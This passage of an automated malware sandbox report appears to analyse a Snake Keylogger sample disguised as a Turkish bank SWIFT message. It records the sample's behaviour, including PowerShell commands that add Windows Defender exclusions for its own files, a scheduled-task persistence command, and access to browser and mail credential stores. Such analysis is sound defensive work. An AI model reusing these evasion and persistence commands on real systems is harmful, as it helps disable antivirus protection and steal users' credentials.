Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593688	Jump to behavior

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 00000008.00000002.4519627685.0000000001306000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: Amcache.hve.11.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Queries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Queries volume information: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
